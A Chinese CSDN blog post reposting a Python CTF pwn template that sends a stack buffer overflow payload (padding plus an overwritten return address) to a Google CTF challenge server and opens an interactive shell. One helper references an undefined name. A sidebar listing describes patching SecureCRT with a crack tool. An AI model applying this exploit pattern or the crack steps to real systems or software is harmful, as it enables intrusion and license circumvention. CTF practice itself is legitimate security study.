CTF之pwnbase.py

最新推荐文章于 2023-05-24 23:04:20 发布
最新推荐文章于 2023-05-24 23:04:20 发布
阅读量412 收藏
点赞数
分类专栏: Linux-Unix
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/caiqiiqi/article/details/80994335
版权

用的时候修改一下域名/IP和端口,然后需要发送的内容即可。

#!/usr/bin/python
import random
import sys
import socket
import telnetlib
import os
import time
import threading
from struct import pack, unpack
from time import time

def recvuntil(sock, txt):
  d = ""
  while d.find(txt) == -1:
    try:
      dnow = sock.recv(1)
      if len(dnow) == 0:
        return ("DISCONNECTED", d)
    except socket.timeout:
      return ("TIMEOUT", d)
    except socket.error as msg:
      return ("ERROR", d)
    d += dnow
  return ("OK", d)

def recvall(sock, n):
  d = ""
  while len(d) != n:
    try:
      dnow = sock.recv(n - len(d))
      if len(dnow) == 0:
        return ("DISCONNECTED", d)
    except socket.timeout:
      return ("TIMEOUT", d)
    except socket.error as msg:
      return ("ERROR", d)
    d += dnow
  return ("OK", d)

# Proxy object for sockets.
class gsocket(object):
  def __init__(self, *p):
    self._sock = socket.socket(*p)

  def __getattr__(self, name):
    return getattr(self._sock, name)

  def recvall(self, n):
    err, ret = recvall(self._sock, n)
    if err != OK:
      return False
    return ret

  def recvuntil(self, txt):
    err, ret = recvuntil(self._sock, txt)
    if err != "OK":
      return False
    return ret

# Base for any of my ROPs.
def db(v):
  return pack("<B", v)

def dw(v):
  return pack("<H", v)

def dd(v):
  return pack("<I", v)

def dq(v):
  return pack("<Q", v)

def rb(v):
  return unpack("<B", v[0])[0]

def rw(v):
  return unpack("<H", v[:2])[0]

def rd(v):
  return unpack("<I", v[:4])[0]

def rq(v):
  return unpack("<Q", v[:8])[0]

def go():
  global HOST
  global PORT
  s = gsocket(socket.AF_INET, socket.SOCK_STREAM)
  s.connect((HOST, PORT))

  # Put your code here!
  s.sendall("2\n")

  newmotd = ("A" * (256 + 8)) + dq(0x00606063A5)


  s.sendall(newmotd + "\n")

  # Interactive sockets.
  t = telnetlib.Telnet()
  t.sock = s
  t.interact()

  # Python console.
  # Note: you might need to modify ReceiverClass if you want
  #       to parse incoming packets.
  #ReceiverClass(s).start()
  #dct = locals()
  #for k in globals().keys():
  #  if k not in dct:
  #    dct[k] = globals()[k]
  #code.InteractiveConsole(dct).interact()

  s.close()

HOST = 'motd.ctfcompetition.com'
PORT = 1337
go()

源文件:
https://github.com/gynvael/stream-en/blob/master/057-beginners-quest/motd/pwnbase.py

caiqiiqi
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
python+Aritest自动化—01—base.py—常用方法的封装
weixin_46088280的博客
11-10 650
后期持续优化 # 对象库层-基类,把定位元素的方法定义在基类中 import logging import pytesseract from PIL import Image from airtest.core.api import * from app_util import AppDriver, logger_config # 综合基类 from conftest import BASE_DIR class Base: # 对于基类而言,后续可能添加其它需要封装方法,那么这些方法也可能用到
python-base.py
06-30
python的小工具,编码转换和文件读写
CTF PWN特点:入门难、进阶难、精通难
IT_huanhuan的博客
05-24 1546
通过第1点中描述,在执行call sum的时候,会将sum 的下一条命令的执行地址0x8048438压入栈中,然后程序进入sum片段进行执行,此时,0x8048438地址就是sum函数的返回地址,即 return address。当执行到ret时,栈空间如下栈地址值0xffffceac0x8048438 # sum的下一条指令0xffffceb01 # a 的值0xffffceb42 # b 的值当执行完ret后,栈空间为。
接口自动化框架(Python)之 三,base.py的配置
商务合作 | 面试培训 | 职场规划 ==>主页扫码
10-24 6289
主要以读取excel表的信息: # -*- coding:utf-8 -*- # @Time : 2019-10-23 # @Author : carl_dj import json import requests from openpyxl.styles import colors from Interface_python3.public.http_service import HT...
Base.py最基层的一些方法的封装--自己整理的一些小内容
weixin_30682415的博客
01-04 261
# -*- coding: utf-8 -*- '''Created on 2017年7月15日 @author: Administrator'''from selenium import webdriverfrom selenium.common.exceptions import * class BasePage(object): ''' 所有页面对象(page ob...
CTFSQL盲注.py
11-25
CTF解题中有时会用到盲注,这是一段SQL盲注代码,运行于python37环境,多个字段信息提取的句子已注释保存。
CTF Crypto 培根密码.py
09-19
CTF Crypto 培根密码 加密解密脚本 python3
ctf.py
02-09
ctf.py CTF的许多有用功能,主要是面向加密的。 在制品。 要求 Python 3.6+ 点子包: gmpy2 pyCryptodome pyOpenSSL 并将其添加到您的PATH。
CTF Crypto BubbleBabble气泡加密.py
09-19
CTF Crypto BubbleBabble 气泡加密 加密解密脚本 python3
CTF指南-常规的CTF题目解析.pptx
10-12
CTF指南-常规的CTF题目解析
CTFCrackTools.7z
08-24
CTFCrackTools 包括各种编码解码功能,可以满足ctf比赛时编解码任务。。。
CTFcrackTools,CTF神器
11-03
CTFcrackTools,CTF神器CTFcrackTools,米特斯安全团队开发的神器
crackTool.rar
06-27
破解步骤 1、下载工具 2、将工具放置CRT安装文件夹内 3、双击工具 4、工具界面中product选项选择SecureCRT 5、任意修改工具界面中name与company值 6、单击工具界面中Patch按钮,在弹出界面中选择CRT启动程序(一般是 SecureCRT.exe)并点击打开按钮,然后在二次弹出框中选择CRT认证程序(一般是 LicenseHelper.exe) 7、点击工具界面中Generate按钮,刷新认证信息 8、打开CRT软件,点击注册,将工具内认证信息对应填入即可
CTFCrackTools
07-15
框架介绍 这大概是国内首个应用于CTF的工具框架。 可以被应用于CTF中的Crypto,Misc... 内置目前主流密码(包括但不限于维吉利亚密码,凯撒密码,栅栏密码······) 用户可自主编写插件,但仅支持Python编写插件。编写方法也极为简单。 该项目一直在增强,这一次的重置只保留了部分核心代码,而将UI及优化代码重构,使这个框架支持更多功能。 项目地址:https://github.com/0Chencc/CTFCrackTools
CTFCrackTools:中国第一个CTFTools框架。中国国内首个CTF工具框架,旨在帮助CTFer快速攻克难关
02-03
CTFcrackTools-V3.2 作者:林晨(0chen) 米斯特安全官网: ://www.acmesec.cn/ 第二版 应老用户要求,将继续更新V2版本。以下是项目地址: 界面介绍 框架介绍 使用kotlin与java混合开发 这大概是国内首个替代CTF的工具框架。 可以被称为CTF中的加密,其他... 内置目前主流密码(包括但不限于维吉利亚密码,凯撒密码,栅栏密码······) 用户可自主编写插件,但仅支持Python编写插件。编写方法也极为简单。 该项目一直在增强,这一次的重置只保留了部分核心代码,而将UI和优化代码嵌入,使这个框架支持更多功能。 项目地址: : 下载编译好的
python自动化框架常用base.py基本操作工具类
hq2116的博客
02-20 751
from selenium import webdriver from selenium.webdriver.support.wait import WebDriverWait from selenium.webdriver.support import expected_conditions as EC import time from selenium.webdriver.common.action_chains import ActionChains from selenium.webdriver.
攻防世界misc新手_攻防世界pwn新手练习(get_shell)
weixin_39630247的博客
11-25 266
pwn入门题目,做题之前先说几个常用的工具(大佬总不至于跑来找这个题的wp吧 手动狗头)IDA ProIDA是一款优秀的静态反汇编工具,好处就不多说了,什么一键F5、字符串搜索、函数位置查找等等,好用的不得了,下载可以去看雪论坛找。pwntoolspwntools官网是这样说的:pwntools是一个CTF框架和开发库。它是用Python编写的,旨在快速构建原型和开发,并使利用编写尽可能简单。 实...
Python 标准库 BaseHTTPServer 中文翻译
Muge
07-16 4081
Python 标准库 BaseHTTPServer 中文翻译。 注意: BaseHTTPServer模块在Python3中已被合并到http.server,当转换你的资源为Python3时https://docs.python.org/2/glossary.html#term-to3“>2to3工具将自动适配导入。 源码:Lib/BaseHTTPServer.py此模块定义了两个类用于实现HTT
记BUUCTF中Crypto做题记录
xeeyuuuu的博客
09-08 1708
BUUCTF中Crypto板块
ctf zsteg stdin.close
最新发布
10-04
ctf是指Capture The Flag,是一种网络安全竞赛的形式。zsteg是一款用于隐写分析的工具,可以从图像中提取隐藏信息。stdin是标准输入的意思,而.close()是Python中用于关闭文件的方法。 "ctf zsteg stdin.close"这句...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值